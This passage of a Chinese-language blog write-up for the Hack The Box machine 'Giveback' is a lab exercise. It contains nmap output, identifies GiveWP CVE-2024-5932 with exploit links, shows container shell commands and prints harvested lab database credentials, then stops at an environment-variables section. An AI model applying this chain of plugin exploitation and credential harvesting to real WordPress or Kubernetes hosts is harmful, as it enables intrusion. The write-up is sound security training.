<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="EnchanterW">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/11/09/htb_giveback/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="So many things to hack , such little time to work.">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB_Giveback">
<meta property="og:url" content="http://example.com/2025/11/09/HTB_Giveback/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="So many things to hack , such little time to work.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-11-09T10:00:00.000Z">
<meta property="article:modified_time" content="2025-11-15T06:54:46.304Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="K8s">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="容器">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
        <!-- Google tag (gtag.js) -->
        <script src="https://www.googletagmanager.com/gtag/js?id=G-DQKJ6ECS1S"></script>
        <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'G-DQKJ6ECS1S');
        </script>
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/favicon.ico" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
    <meta name="theme-color" content="#3C9566">
    <link rel="shortcut icon" href="/images/favicon.ico">
    <!--- Page Info-->
    
    <title>
        
            HTB_Giveback | Enchanterの小本本
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    
        
<script src="/js/build/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#3C9566","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":true,"custom_message":"So many things to hack , such little time to work."},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"So many things to hack , such little time to work."},"google_analytics":{"enable":true,"id":"G-DQKJ6ECS1S"}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Wellcome to my blog","subtitle":{"text":["So many things to hack , such little time to work."],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#ffffff","dark":"#053154"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":null}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/Enchanter-W","Blog":"https://enchanter-w.github.io/","Friends":"/friends"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Archives":{"path":"/archives/","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags/","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories/","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2024/12/30 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
        
<link rel="stylesheet" href="/fontawesome/sharp-solid.min.css">

    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        So many things to hack , such little time to work.
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({ loop: true })
            .add({
                targets: '.ml13 .letter',
                translateY: [20, 0],
                translateZ: 0,
                opacity: [0, 1],
                filter: ['blur(5px)', 'blur(0px)'],
                easing: "easeOutExpo",
                duration: 1200,
                delay: (el, i) => 300 + 20 * i,
            })
            .add({
                targets: '.ml13 .letter',
                translateY: [0, -20],
                opacity: [1, 0],
                filter: ['blur(0px)', 'blur(5px)'],
                easing: "easeInExpo",
                duration: 1000,
                delay: (el, i) => 15 * i,
                complete: function() {
                    hidePreloader();
                }
            }, '-=700');


        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
                <a class="logo-image h-8 w-8 sm:w-10 sm:h-10 mr-3" href="/">
                    <img src="/images/web-app-manifest-192x192.png" class="w-full h-full rounded-sm">
                </a>
            
            <a class="logo-title" href="/">
                
                Enchanterの小本本
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://github.com/Enchanter-W">
                                                    GITHUB
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://enchanter-w.github.io/">
                                                    BLOG
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a href="/friends">
                                                    FRIENDS
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://github.com/Enchanter-W">GITHUB</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://enchanter-w.github.io/">BLOG</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/friends">FRIENDS</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
                
                    
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/tags/"
                        >
                            <span>Tags</span>
                            <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/categories/"
                        >
                            <span>Categories</span>
                            <i class="fa-regular fa-folder fa-sm fa-fw"></i>
                        </a>
                    </li>
                
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">44</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">6</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">19</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			
			
			<img src="/images/Giveback_cover.png" alt="HTB_Giveback" class="w-full h-60 sm:h-72 md:h-80 object-cover sm:rounded-t-large dark:brightness-75" />
			
			<div class="w-full flex items-center absolute bottom-0 justify-start">
				<h1 class="article-title-cover text-center mx-6 my-6 text-second-text-color bg-background-color-transparent px-4 py-3 text-3xl sm:text-4xl md:text-5xl font-semibold backdrop-blur-lg rounded-xl border border-border-color ">HTB_Giveback</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/web-app-manifest-192x192.png">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">EnchanterW</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv3</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-11-09 18:00</span>
        <span class="mobile">2025-11-09 18:00</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-11-15 14:54:46</span>
            <span class="mobile">2025-11-15 14:54:46</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Writeup/">Writeup</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/K8s/">K8s</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Linux/">Linux</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E5%AE%B9%E5%99%A8/">容器</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h2 id="Scan"><a href="#Scan" class="headerlink" title="Scan"></a>Scan</h2><details class="blue" data-header-exclude><summary><i class="fa-solid fa-chevron-right"></i>Nmap Scan Results </summary>
              <div class='content'>
              <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Nmap 7.95 scan initiated Sun Nov  2 10:55:22 2025 as: /usr/lib/nmap/nmap -sT -sC -A -O -p22,80,30686 -oA ./nmapscan/details --min-rate=2500 -Pn 10.129.177.249</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.129.177.249</span><br><span class="line">Host is up (0.36s latency).</span><br><span class="line"></span><br><span class="line">PORT      STATE SERVICE VERSION</span><br><span class="line">22/tcp    open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   256 66:f8:9c:58:f4:b8:59:bd:<span class="built_in">cd</span>:ec:92:24:c3:97:8e:9e (ECDSA)</span><br><span class="line">|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)</span><br><span class="line">80/tcp    open  http    nginx 1.28.0</span><br><span class="line">|_http-title: GIVING BACK IS WHAT MATTERS MOST &amp;#8211; OBVI</span><br><span class="line">|_http-server-header: nginx/1.28.0</span><br><span class="line">|_http-generator: WordPress 6.8.1</span><br><span class="line">| http-robots.txt: 1 disallowed entry </span><br><span class="line">|_/wp-admin/</span><br><span class="line">30686/tcp open  http    Golang net/http server</span><br><span class="line">|_http-title: Site doesn<span class="string">&#x27;t have a title (application/json).</span></span><br><span class="line"><span class="string">| fingerprint-strings: </span></span><br><span class="line"><span class="string">|   FourOhFourRequest: </span></span><br><span class="line"><span class="string">|     HTTP/1.0 200 OK</span></span><br><span class="line"><span class="string">|     Content-Type: application/json</span></span><br><span class="line"><span class="string">|     X-Content-Type-Options: nosniff</span></span><br><span class="line"><span class="string">|     X-Load-Balancing-Endpoint-Weight: 1</span></span><br><span class="line"><span class="string">|     Date: Sun, 02 Nov 2025 15:55:50 GMT</span></span><br><span class="line"><span class="string">|     Content-Length: 127</span></span><br><span class="line"><span class="string">|     &quot;service&quot;: &#123;</span></span><br><span class="line"><span class="string">|     &quot;namespace&quot;: &quot;default&quot;,</span></span><br><span class="line"><span class="string">|     &quot;name&quot;: &quot;wp-nginx-service&quot;</span></span><br><span class="line"><span class="string">|     &quot;localEndpoints&quot;: 1,</span></span><br><span class="line"><span class="string">|     &quot;serviceProxyHealthy&quot;: true</span></span><br><span class="line"><span class="string">|   GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq: </span></span><br><span class="line"><span class="string">|     HTTP/1.1 400 Bad Request</span></span><br><span class="line"><span class="string">|     Content-Type: text/plain; charset=utf-8</span></span><br><span class="line"><span class="string">|     Connection: close</span></span><br><span class="line"><span class="string">|     Request</span></span><br><span class="line"><span class="string">|   GetRequest: </span></span><br><span class="line"><span class="string">|     HTTP/1.0 200 OK</span></span><br><span class="line"><span class="string">|     Content-Type: application/json</span></span><br><span class="line"><span class="string">|     X-Content-Type-Options: nosniff</span></span><br><span class="line"><span class="string">|     X-Load-Balancing-Endpoint-Weight: 1</span></span><br><span class="line"><span class="string">|     Date: Sun, 02 Nov 2025 15:55:30 GMT</span></span><br><span class="line"><span class="string">|     Content-Length: 127</span></span><br><span class="line"><span class="string">|     &quot;service&quot;: &#123;</span></span><br><span class="line"><span class="string">|     &quot;namespace&quot;: &quot;default&quot;,</span></span><br><span class="line"><span class="string">|     &quot;name&quot;: &quot;wp-nginx-service&quot;</span></span><br><span class="line"><span class="string">|     &quot;localEndpoints&quot;: 1,</span></span><br><span class="line"><span class="string">|     &quot;serviceProxyHealthy&quot;: true</span></span><br><span class="line"><span class="string">|   HTTPOptions: </span></span><br><span class="line"><span class="string">|     HTTP/1.0 200 OK</span></span><br><span class="line"><span class="string">|     Content-Type: application/json</span></span><br><span class="line"><span class="string">|     X-Content-Type-Options: nosniff</span></span><br><span class="line"><span class="string">|     X-Load-Balancing-Endpoint-Weight: 1</span></span><br><span class="line"><span class="string">|     Date: Sun, 02 Nov 2025 15:55:31 GMT</span></span><br><span class="line"><span class="string">|     Content-Length: 127</span></span><br><span class="line"><span class="string">|     &quot;service&quot;: &#123;</span></span><br><span class="line"><span class="string">|     &quot;namespace&quot;: &quot;default&quot;,</span></span><br><span class="line"><span class="string">|     &quot;name&quot;: &quot;wp-nginx-service&quot;</span></span><br><span class="line"><span class="string">|     &quot;localEndpoints&quot;: 1,</span></span><br><span class="line"><span class="string">|_    &quot;serviceProxyHealthy&quot;: true</span></span><br></pre></td></tr></table></figure></div>
              </div>
            </details>


  <div class="note p-4 mb-4 rounded-small info icon-padding">
    <i class="note-icon fa-solid fa-crosshairs"></i><p>初步扫描发现 <code>80</code> 端口为 WordPress 站点，<code>30686</code> 端口为一个 Golang 服务，暂时用途不明，优先对 <code>80</code> 端口进行测试。</p>

  </div>

<p>通过 <code>robots.txt</code> 和 <code>wpscan</code> 扫描，发现存在 <strong>GiveWP</strong> 插件漏洞。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251105215453500.png"
                      alt="image-20251105215453500"
                ></p>
<p>根据版本号搜索，发现可利用漏洞 CVE-2024-5932 <a target="_blank" rel="noopener" href="https://github.com/EQSTLab/CVE-2024-5932"><sup>2</sup></a>。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251105215819486.png"
                      alt="image-20251105215819486"
                ></p>
<p>漏洞利用需要找到 Donation page，可以通过以下文章获取具体路径。</p>
<a class="button  regular" target="_blank" rel="noopener" href='https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/' title='漏洞手动利用方式'><i class='fa-solid fa-paper-plane'></i> 漏洞手动利用方式</a>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Enchanter-W/Pics/master/image-20251105220602888.png"
                      alt="image-20251105220602888"
                ></p>
<h2 id="Shell"><a href="#Shell" class="headerlink" title="Shell"></a>Shell</h2><h3 id="shell1"><a href="#shell1" class="headerlink" title="shell1"></a>shell1</h3><h4 id="enum"><a href="#enum" class="headerlink" title="enum"></a>enum</h4>
  <div class="note p-4 mb-4 rounded-small warning icon-padding">
    <i class="note-icon fa-solid fa-terminal"></i><p>获取初始 Shell 后，发现环境是一个容器，缺少 <code>ip</code>、<code>ifconfig</code> 等常用命令，导致初期难以确定内网 IP。<del class="mask">实际上是因为我太菜了找不到方法来确定，如果有师傅看到这里请给我点指点。</del> </p>

  </div>

<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;-59cf8f55c7-mjhp5:/opt/bitnami/wordpress/wp-admin$ hostname</span><br><span class="line">hostname</span><br><span class="line">beta-vino-wp-wordpress-59cf8f55c7-mjhp5</span><br><span class="line">&lt;-59cf8f55c7-mjhp5:/opt/bitnami/wordpress/wp-admin$ ip a</span><br><span class="line">ip a</span><br><span class="line">bash: ip: <span class="built_in">command</span> not found</span><br></pre></td></tr></table></figure></div>

<p>查看 <code>wp-config</code> 文件获取数据库凭据。</p>
<div class="code-container" data-rel="Php"><figure class="iseeu highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ** Database settings - You can get this info from your web host ** //</span></span><br><span class="line"><span class="comment">/** The name of the database for WordPress */</span></span><br><span class="line"><span class="title function_ invoke__">define</span>( <span class="string">&#x27;DB_NAME&#x27;</span>, <span class="string">&#x27;bitnami_wordpress&#x27;</span> );</span><br><span class="line"><span class="comment">/** Database username */</span>                                     </span><br><span class="line"><span class="title function_ invoke__">define</span>( <span class="string">&#x27;DB_USER&#x27;</span>, <span class="string">&#x27;bn_wordpress&#x27;</span> );                                                                 </span><br><span class="line"><span class="comment">/** Database password */</span>                         </span><br><span class="line"><span class="title function_ invoke__">define</span>( <span class="string">&#x27;DB_PASSWORD&#x27;</span>, <span class="string">&#x27;sW5sp4spa3u7RLyetrekE4oS&#x27;</span> );                                                               </span><br><span class="line"><span class="comment">/** Database hostname */</span>       </span><br><span class="line"><span class="title function_ invoke__">define</span>( <span class="string">&#x27;DB_HOST&#x27;</span>, <span class="string">&#x27;beta-vino-wp-mariadb:3306&#x27;</span> );</span><br></pre></td></tr></table></figure></div>

<p>查看环境变量，发现大量内网服务信息，其中 <code>10.43.0.0/16</code> 网段引起了注意。</p>
<details class="blue" data-header-exclude><summary><i class="fa-solid fa-chevron-right"></i>环境变量信息 </summary>
              <div class='content'>
